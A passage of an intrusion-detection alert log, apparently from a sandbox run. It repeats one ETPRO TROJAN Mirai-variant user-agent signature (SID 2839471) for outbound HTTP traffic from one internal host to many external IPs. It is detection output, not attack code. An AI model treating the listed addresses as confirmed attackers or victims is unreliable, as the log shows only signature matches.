Source Port:	53568
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.255.93.92

Timestamp:	192.168.2.1595.255.93.9242718802839471 02/14/24-09:29:05.627978
SID:	2839471
Source Port:	42718
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.59.121.53

Timestamp:	192.168.2.1595.59.121.5345162802839471 02/14/24-09:29:40.401154
SID:	2839471
Source Port:	45162
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.7.114.103

Timestamp:	192.168.2.1595.7.114.10339656802839471 02/14/24-09:30:43.784052
SID:	2839471
Source Port:	39656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.74.127.22

Timestamp:	192.168.2.15112.74.127.2247730802839471 02/14/24-09:29:00.314833
SID:	2839471
Source Port:	47730
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.218.158.213

Timestamp:	192.168.2.1588.218.158.21359270802839471 02/14/24-09:29:33.853105
SID:	2839471
Source Port:	59270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.59.243.129

Timestamp:	192.168.2.1595.59.243.12938848802839471 02/14/24-09:30:48.161309
SID:	2839471
Source Port:	38848
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.190.36

Timestamp:	192.168.2.1595.100.190.3637162802839471 02/14/24-09:31:17.689597
SID:	2839471
Source Port:	37162
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.185.37

Timestamp:	192.168.2.1595.100.185.3740640802839471 02/14/24-09:29:15.504414
SID:	2839471
Source Port:	40640
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.6.26

Timestamp:	192.168.2.1595.216.6.2636432802839471 02/14/24-09:30:29.841357
SID:	2839471
Source Port:	36432
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.88.186

Timestamp:	192.168.2.1595.101.88.18635044802839471 02/14/24-09:30:43.733535
SID:	2839471
Source Port:	35044
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.168.212

Timestamp:	192.168.2.1588.99.168.21236206802839471 02/14/24-09:30:31.339860
SID:	2839471
Source Port:	36206
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.135.219.68

Timestamp:	192.168.2.15112.135.219.6851420802839471 02/14/24-09:29:00.287610
SID:	2839471
Source Port:	51420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.179.114

Timestamp:	192.168.2.1595.100.179.11447876802839471 02/14/24-09:30:48.091961
SID:	2839471
Source Port:	47876
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.25.57.43

Timestamp:	192.168.2.15112.25.57.4354646802839471 02/14/24-09:31:02.778009
SID:	2839471
Source Port:	54646
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.127.249

Timestamp:	192.168.2.1595.216.127.24942706802839471 02/14/24-09:29:57.507595
SID:	2839471
Source Port:	42706
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.184.60.51

Timestamp:	192.168.2.15112.184.60.5138690802839471 02/14/24-09:29:03.705439
SID:	2839471
Source Port:	38690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.58.54.92

Timestamp:	192.168.2.1595.58.54.9239562802839471 02/14/24-09:30:24.760817
SID:	2839471
Source Port:	39562
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.149.149

Timestamp:	192.168.2.1595.101.149.14956100802839471 02/14/24-09:30:37.193296
SID:	2839471
Source Port:	56100
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.128.42.202

Timestamp:	192.168.2.1595.128.42.20250708802839471 02/14/24-09:30:06.424087
SID:	2839471
Source Port:	50708
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.22.10

Timestamp:	192.168.2.1595.164.22.1036698802839471 02/14/24-09:30:59.771528
SID:	2839471
Source Port:	36698
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.1.126

Timestamp:	192.168.2.1595.164.1.12654004802839471 02/14/24-09:30:11.615893
SID:	2839471
Source Port:	54004
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.70.23

Timestamp:	192.168.2.1595.101.70.2356420802839471 02/14/24-09:31:13.059367
SID:	2839471
Source Port:	56420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.102.40

Timestamp:	192.168.2.1595.86.102.4056872802839471 02/14/24-09:30:14.786063
SID:	2839471
Source Port:	56872
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.240.204.194

Timestamp:	192.168.2.1595.240.204.19436554802839471 02/14/24-09:31:13.069495
SID:	2839471
Source Port:	36554
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.18.101

Timestamp:	192.168.2.1595.216.18.10151720802839471 02/14/24-09:29:56.523011
SID:	2839471
Source Port:	51720
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.57.101.214

Timestamp:	192.168.2.1595.57.101.21447620802839471 02/14/24-09:30:48.588020
SID:	2839471
Source Port:	47620
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.28.177.64

Timestamp:	192.168.2.1588.28.177.6441816802839471 02/14/24-09:30:16.641450
SID:	2839471
Source Port:	41816
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.181.228.164

Timestamp:	192.168.2.1595.181.228.16439936802839471 02/14/24-09:30:06.794584
SID:	2839471
Source Port:	39936
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.232.93

Timestamp:	192.168.2.1595.111.232.9350378802839471 02/14/24-09:29:33.432165
SID:	2839471
Source Port:	50378
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.189.25

Timestamp:	192.168.2.1595.100.189.2548516802839471 02/14/24-09:29:51.661319
SID:	2839471
Source Port:	48516
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.150.108

Timestamp:	192.168.2.1595.217.150.10844132802839471 02/14/24-09:29:56.522497
SID:	2839471
Source Port:	44132
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.19.63

Timestamp:	192.168.2.1595.101.19.6344014802839471 02/14/24-09:29:56.521559
SID:	2839471
Source Port:	44014
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.123.182

Timestamp:	192.168.2.1595.216.123.18251872802839471 02/14/24-09:29:56.764313
SID:	2839471
Source Port:	51872
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.226.64

Timestamp:	192.168.2.1588.221.226.6455164802839471 02/14/24-09:30:00.960733
SID:	2839471
Source Port:	55164
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.53.49

Timestamp:	192.168.2.1595.100.53.4955572802839471 02/14/24-09:28:56.050828
SID:	2839471
Source Port:	55572
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.84.219.103

Timestamp:	192.168.2.1588.84.219.10350440802839471 02/14/24-09:30:19.190524
SID:	2839471
Source Port:	50440
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.213.32.238

Timestamp:	192.168.2.15112.213.32.23832960802839471 02/14/24-09:30:08.906175
SID:	2839471
Source Port:	32960
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.204.254

Timestamp:	192.168.2.1595.216.204.25436962802839471 02/14/24-09:29:19.025452
SID:	2839471
Source Port:	36962
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.59.106.192

Timestamp:	192.168.2.1595.59.106.19255242802839471 02/14/24-09:30:34.062554
SID:	2839471
Source Port:	55242
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.241.12

Timestamp:	192.168.2.1595.101.241.1259074802839471 02/14/24-09:30:14.533215
SID:	2839471
Source Port:	59074
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.36.119

Timestamp:	192.168.2.1588.99.36.11951556802839471 02/14/24-09:30:06.226730
SID:	2839471
Source Port:	51556
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.161.169

Timestamp:	192.168.2.1595.217.161.16951832802839471 02/14/24-09:30:24.692627
SID:	2839471
Source Port:	51832
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.97.116

Timestamp:	192.168.2.1588.99.97.11639818802839471 02/14/24-09:30:19.609726
SID:	2839471
Source Port:	39818
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.159.70.238

Timestamp:	192.168.2.15112.159.70.23836342802839471 02/14/24-09:29:22.049211
SID:	2839471
Source Port:	36342
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.12.95.45

Timestamp:	192.168.2.1588.12.95.4536480802839471 02/14/24-09:29:31.793267
SID:	2839471
Source Port:	36480
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.132.215.153

Timestamp:	192.168.2.15112.132.215.15345590802839471 02/14/24-09:29:48.351282
SID:	2839471
Source Port:	45590
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.237.209.81

Timestamp:	192.168.2.1595.237.209.8143078802839471 02/14/24-09:31:06.734740
SID:	2839471
Source Port:	43078
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.83.127.154

Timestamp:	192.168.2.1595.83.127.15438446802839471 02/14/24-09:31:13.699113
SID:	2839471
Source Port:	38446
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.56.57.210

Timestamp:	192.168.2.1595.56.57.21048484802839471 02/14/24-09:29:33.513112
SID:	2839471
Source Port:	48484
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.212.8.12

Timestamp:	192.168.2.1588.212.8.1259908802839471 02/14/24-09:31:16.432632
SID:	2839471
Source Port:	59908
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.78.1.57

Timestamp:	192.168.2.15112.78.1.5734772802839471 02/14/24-09:29:01.019005
SID:	2839471
Source Port:	34772
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.116.48

Timestamp:	192.168.2.1595.101.116.4852464802839471 02/14/24-09:29:08.916682
SID:	2839471
Source Port:	52464
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.200.97

Timestamp:	192.168.2.1595.101.200.9745228802839471 02/14/24-09:29:51.448153
SID:	2839471
Source Port:	45228
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.169.120.242

Timestamp:	192.168.2.15112.169.120.24251906802839471 02/14/24-09:28:49.299837
SID:	2839471
Source Port:	51906
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.168.163.80

Timestamp:	192.168.2.15112.168.163.8042402802839471 02/14/24-09:30:10.668281
SID:	2839471
Source Port:	42402
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.205.6

Timestamp:	192.168.2.1595.100.205.644980802839471 02/14/24-09:30:52.970267
SID:	2839471
Source Port:	44980
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.237.36

Timestamp:	192.168.2.1595.217.237.3641208802839471 02/14/24-09:30:44.640108
SID:	2839471
Source Port:	41208
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.74.32.155

Timestamp:	192.168.2.15112.74.32.15542252802839471 02/14/24-09:29:22.833929
SID:	2839471
Source Port:	42252
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.110.177.150

Timestamp:	192.168.2.1595.110.177.15035120802839471 02/14/24-09:30:11.637297
SID:	2839471
Source Port:	35120
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.203.251

Timestamp:	192.168.2.1595.217.203.25134672802839471 02/14/24-09:29:56.523072
SID:	2839471
Source Port:	34672
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.180.15.84

Timestamp:	192.168.2.15112.180.15.8435190802839471 02/14/24-09:28:47.080473
SID:	2839471
Source Port:	35190
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.16.101

Timestamp:	192.168.2.1595.217.16.10152880802839471 02/14/24-09:31:13.514224
SID:	2839471
Source Port:	52880
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.125.89

Timestamp:	192.168.2.1595.86.125.8955130802839471 02/14/24-09:29:40.363153
SID:	2839471
Source Port:	55130
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.180.119

Timestamp:	192.168.2.1588.221.180.11948634802839471 02/14/24-09:31:11.284539
SID:	2839471
Source Port:	48634
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.214.235.221

Timestamp:	192.168.2.1595.214.235.22136028802839471 02/14/24-09:31:17.920887
SID:	2839471
Source Port:	36028
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.60.15.224

Timestamp:	192.168.2.15112.60.15.22439526802839471 02/14/24-09:29:28.156474
SID:	2839471
Source Port:	39526
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.221.66

Timestamp:	192.168.2.1595.101.221.6643204802839471 02/14/24-09:29:35.298891
SID:	2839471
Source Port:	43204
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.143.181.98

Timestamp:	192.168.2.1595.143.181.9839556802839471 02/14/24-09:30:52.937642
SID:	2839471
Source Port:	39556
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.183.141

Timestamp:	192.168.2.1595.217.183.14157652802839471 02/14/24-09:30:37.201439
SID:	2839471
Source Port:	57652
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.127.15

Timestamp:	192.168.2.1595.100.127.1545086802839471 02/14/24-09:28:47.585598
SID:	2839471
Source Port:	45086
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.105.38.98

Timestamp:	192.168.2.15112.105.38.9855688802839471 02/14/24-09:29:01.649846
SID:	2839471
Source Port:	55688
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.42.211.55

Timestamp:	192.168.2.1595.42.211.5533254802839471 02/14/24-09:31:06.727203
SID:	2839471
Source Port:	33254
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.56.20.15

Timestamp:	192.168.2.1595.56.20.1555822802839471 02/14/24-09:30:06.605735
SID:	2839471
Source Port:	55822
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.203.212

Timestamp:	192.168.2.1595.101.203.21236494802839471 02/14/24-09:30:50.503021
SID:	2839471
Source Port:	36494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.0.142.188

Timestamp:	192.168.2.1595.0.142.18850632802839471 02/14/24-09:30:27.512422
SID:	2839471
Source Port:	50632
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.41.168

Timestamp:	192.168.2.1595.101.41.16842310802839471 02/14/24-09:30:24.695697
SID:	2839471
Source Port:	42310
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.170.82.199

Timestamp:	192.168.2.1595.170.82.19952622802839471 02/14/24-09:31:13.467215
SID:	2839471
Source Port:	52622
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.218.138.42

Timestamp:	192.168.2.1588.218.138.4242472802839471 02/14/24-09:30:26.278524
SID:	2839471
Source Port:	42472
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.14.37

Timestamp:	192.168.2.1595.101.14.3748976802839471 02/14/24-09:30:24.696063
SID:	2839471
Source Port:	48976
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.46.0.156

Timestamp:	192.168.2.1595.46.0.15657584802839471 02/14/24-09:31:16.887660
SID:	2839471
Source Port:	57584
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.231.123

Timestamp:	192.168.2.1595.100.231.12333398802839471 02/14/24-09:30:24.256489
SID:	2839471
Source Port:	33398
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.175.213

Timestamp:	192.168.2.1595.101.175.21351674802839471 02/14/24-09:30:50.097654
SID:	2839471
Source Port:	51674
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.126.91.177

Timestamp:	192.168.2.15112.126.91.17755850802839471 02/14/24-09:29:13.338241
SID:	2839471
Source Port:	55850
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.74.59.150

Timestamp:	192.168.2.15112.74.59.15052534802839471 02/14/24-09:29:00.651651
SID:	2839471
Source Port:	52534
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.205.132

Timestamp:	192.168.2.1595.100.205.13259690802839471 02/14/24-09:30:43.758353
SID:	2839471
Source Port:	59690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.74.127.163

Timestamp:	192.168.2.15112.74.127.16356520802839471 02/14/24-09:31:14.865359
SID:	2839471
Source Port:	56520
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.167.233.6

Timestamp:	192.168.2.15112.167.233.639906802839471 02/14/24-09:29:22.020632
SID:	2839471
Source Port:	39906
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.85.242.201

Timestamp:	192.168.2.15112.85.242.20144188802839471 02/14/24-09:30:08.929550
SID:	2839471
Source Port:	44188
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.179.56

Timestamp:	192.168.2.1588.99.179.5658608802839471 02/14/24-09:29:33.638348
SID:	2839471
Source Port:	58608
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.105.189

Timestamp:	192.168.2.1595.100.105.18943004802839471 02/14/24-09:29:08.720880
SID:	2839471
Source Port:	43004
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.254.57

Timestamp:	192.168.2.1595.111.254.5749402802839471 02/14/24-09:29:56.727571
SID:	2839471
Source Port:	49402
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.168.249.26

Timestamp:	192.168.2.1595.168.249.2636194802839471 02/14/24-09:29:33.449356
SID:	2839471
Source Port:	36194
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.212.218.18

Timestamp:	192.168.2.1588.212.218.1837846802839471 02/14/24-09:30:19.189345
SID:	2839471
Source Port:	37846
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.80.174

Timestamp:	192.168.2.1595.217.80.17439124802839471 02/14/24-09:29:42.740948
SID:	2839471
Source Port:	39124
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.128.129.61

Timestamp:	192.168.2.1595.128.129.6141502802839471 02/14/24-09:29:33.421569
SID:	2839471
Source Port:	41502
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.192.19.97

Timestamp:	192.168.2.15112.192.19.9746576802839471 02/14/24-09:29:48.420063
SID:	2839471
Source Port:	46576
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.68.75.49

Timestamp:	192.168.2.1595.68.75.4935480802839471 02/14/24-09:30:11.639631
SID:	2839471
Source Port:	35480
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.216.115.50

Timestamp:	192.168.2.15112.216.115.5034804802839471 02/14/24-09:29:14.015912
SID:	2839471
Source Port:	34804
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.5.123

Timestamp:	192.168.2.1595.100.5.12358368802839471 02/14/24-09:29:19.170435
SID:	2839471
Source Port:	58368
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

